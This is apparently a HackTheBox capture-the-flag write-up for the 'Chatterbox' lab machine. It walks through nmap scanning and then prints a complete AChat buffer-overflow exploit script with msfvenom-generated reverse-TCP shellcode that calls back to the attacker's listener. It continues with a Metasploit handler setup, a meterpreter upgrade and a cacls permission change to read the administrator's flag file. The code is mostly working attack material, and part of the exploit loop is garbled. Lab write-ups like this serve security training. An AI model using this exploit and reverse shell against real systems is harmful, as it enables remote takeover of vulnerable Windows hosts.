Uncategorized

Chatterbox – HackTheBox Writeup

So first things first, lets nmap it:

root@Kali:~/Documents/pentests/HTB/Chatterbox# nmap -v -T5 -p 9000-9999 -oA nmap 10.10.10.74

Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-14 07:30 EST
Initiating Ping Scan at 07:30
Scanning 10.10.10.74 [4 ports]
Completed Ping Scan at 07:30, 0.45s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 07:30
Completed Parallel DNS resolution of 1 host. at 07:30, 2.06s elapsed
Initiating SYN Stealth Scan at 07:30
Scanning 10.10.10.74 [1000 ports]
Discovered open port 9255/tcp on 10.10.10.74
Increasing send delay for 10.10.10.74 from 0 to 5 due to 11 out of 21 dropped probes since last increase.
SYN Stealth Scan Timing: About 42.20% done; ETC: 07:31 (0:00:42 remaining)
Discovered open port 9256/tcp on 10.10.10.74
Warning: 10.10.10.74 giving up on port because retransmission cap hit (2).
Completed SYN Stealth Scan at 07:31, 72.89s elapsed (1000 total ports)
Nmap scan report for 10.10.10.74
Host is up (0.28s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
9255/tcp open mon
9256/tcp open unknown

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 75.50 seconds
Raw packets sent: 3039 (133.692KB) | Rcvd: 41 (1.788KB)

 

After that lets do a port scan on only 9255, and 9256

root@Kali:~/Documents/pentests/HTB/Chatterbox# nmap -p 9255,9256 -sC -sV 10.10.10.74

Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-14 07:35 EST
Nmap scan report for 10.10.10.74
Host is up (0.28s latency).

PORT STATE SERVICE VERSION
9255/tcp open http AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp open achat AChat chat system

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.84 seconds

So now we know that Achat is running. The exploit for this is :

We set up our own shellcode:

msfvenom -a x86 --platform Windows -p windows/shell/reverse_tcp LHOST=10.10.14.16 LPORT=4444 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python > exploit.py

After which the, we use the exploit :

#!/usr/bin/python
# Achat 0.150 beta7 - Buffer Overflow

import socket
import sys, time

buf =  ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x69\x6c\x39\x58\x72\x62"
buf += "\x6d\x30\x39\x70\x39\x70\x63\x30\x35\x39\x57\x75\x4e"
buf += "\x51\x67\x50\x52\x44\x54\x4b\x70\x50\x50\x30\x74\x4b"
buf += "\x6f\x62\x7a\x6c\x52\x6b\x6f\x62\x4b\x64\x74\x4b\x61"
buf += "\x62\x4d\x58\x5a\x6f\x36\x57\x6e\x6a\x6d\x56\x30\x31"
buf += "\x39\x6f\x54\x6c\x6f\x4c\x61\x51\x33\x4c\x4b\x52\x6c"
buf += "\x6c\x4f\x30\x77\x51\x78\x4f\x5a\x6d\x39\x71\x37\x57"
buf += "\x5a\x42\x7a\x52\x4f\x62\x52\x37\x34\x4b\x31\x42\x7a"
buf += "\x70\x52\x6b\x6e\x6a\x6f\x4c\x42\x6b\x4e\x6c\x6c\x51"
buf += "\x50\x78\x77\x73\x6e\x68\x6a\x61\x67\x61\x70\x51\x32"
buf += "\x6b\x6e\x79\x4b\x70\x39\x71\x6a\x33\x64\x4b\x50\x49"
buf += "\x5a\x78\x37\x73\x6e\x5a\x61\x39\x42\x6b\x50\x34\x74"
buf += "\x4b\x49\x71\x78\x56\x4d\x61\x59\x6f\x64\x6c\x69\x31"
buf += "\x76\x6f\x4c\x4d\x49\x71\x56\x67\x30\x38\x59\x50\x50"
buf += "\x75\x49\x66\x49\x73\x31\x6d\x39\x68\x4f\x4b\x73\x4d"
buf += "\x6d\x54\x62\x55\x38\x64\x72\x38\x42\x6b\x31\x48\x6c"
buf += "\x64\x7a\x61\x56\x73\x63\x36\x44\x4b\x4c\x4c\x6e\x6b"
buf += "\x64\x4b\x71\x48\x6b\x6c\x59\x71\x57\x63\x54\x4b\x6a"
buf += "\x64\x52\x6b\x69\x71\x48\x50\x43\x59\x4d\x74\x4b\x74"
buf += "\x4f\x34\x31\x4b\x6f\x6b\x43\x31\x4f\x69\x70\x5a\x72"

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('10.10.10.74', 9256)

fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
p  = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
p += "\x62" + "A"*45
p += "\x61\x40"
p += "\x2A\x46"
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
p += "\x61\x43" + "\x2A\x46"
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
p += buf + "A" * (1152 - len(buf))
p += "\x00" + "A"*10 + "\x00"

print "---->{P00F}!"
i=0
while i<len(p): if i > 172000:
        time.sleep(1.0)
    sent = sock.sendto(p[i:(i+8192)], server_address)
    i += sent
sock.close()

Set up a listener :

msfconsole > use exploit/multi/handler
msfconsole > set payload windows/shell/reverse_tcp
msfconsole > set lhost 10.10.14.16
msfconsole > run

Run exploit.py and you will get the shell in your msfconsole. And then we can upgrade the shell from reguslar shell to meterpreter. Using post/multi/manage/shell_to_meterpreter. After you get the meterpreter shell, we can see that we are able to go into the Dekstop of the Administrator and we can see that the root.txt file is there, however we cant view it.

So to view it we run : cacls root.txt /E /P chatterbox\alfred:F

This makes the file fully viewable. We can do a : more root.txt to get the flag.

And then go into the Alfred desktop to view the user.txt file.

Leave a Reply

Your email address will not be published. Required fields are marked *